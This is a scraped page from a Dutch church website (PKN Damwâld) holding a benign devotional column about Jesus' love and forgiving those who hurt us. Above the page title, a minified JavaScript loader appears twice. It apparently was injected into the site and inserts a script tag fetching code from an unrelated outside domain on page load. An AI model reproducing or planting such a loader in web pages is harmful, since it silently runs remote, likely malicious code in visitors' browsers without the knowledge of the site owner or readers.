;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Jezus’ hart klopte voor ons allemaal - PKN Damwâld

Jezus’ hart klopte voor ons allemaal

Gepubliceerd op: vrijdag 21 april 2023

Voor wie klopt jou hart? Klopt jou hart ook voor alle mensen of maak je uitzonderingen?

Ik heb altijd veel liefde gehad voor andere mensen, maar wanneer ik gekwetst werd dan werd het moeilijk om de mensen die me kwetsten lief te blijven hebben. Ik sloot ze liever buiten zodat ze me niet nog een keer konden kwetsen. Maar dit is niet wat Jezus ons probeert te leren.

Jezus leerde ons om álle mensen lief te hebben om compassie te hebben met mensen die dingen anders doen en om hen uit te nodigen in je hart. Oók als ze je gekwetst hebben of misschien wel juíst als ze je gekwetst hebben. We leren niet voor niks dat we ook ons andere wang toe mogen keren. Dus leer de mensen die je kwetsen in je hart te sluiten. Ons hart leert ons namelijk over liefde en compassie.

En met deze liefde en compassie kan gekwetstheid geheeld worden.

Omdat deze liefde en compassie in ons hart zo belangrijk zijn bij pijn en verdriet, klopt Jezus ook aan ons hart. Hij vraagt ons om ons hart te openen voor álle mensen, net zoals hij deed. Niet alleen voor de mensen die we liefhebben, maar ook juist voor de mensen die we niet begrijpen of die ons gekwetst hebben. Ons hart heeft een wijsheid die boven alles gaat. De wijsheid van liefde, de liefde van God.

Gods liefde stroomt door ons hart en die kan al ons gekwetstheid helen.

Dus als je weer een keer gekwetst wordt, neem dit gevoel mee naar je hart en laat de liefde van God die door jouw hart stroomt deze gekwetstheid helen. God is altijd met ons.

Columnist:Ester

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns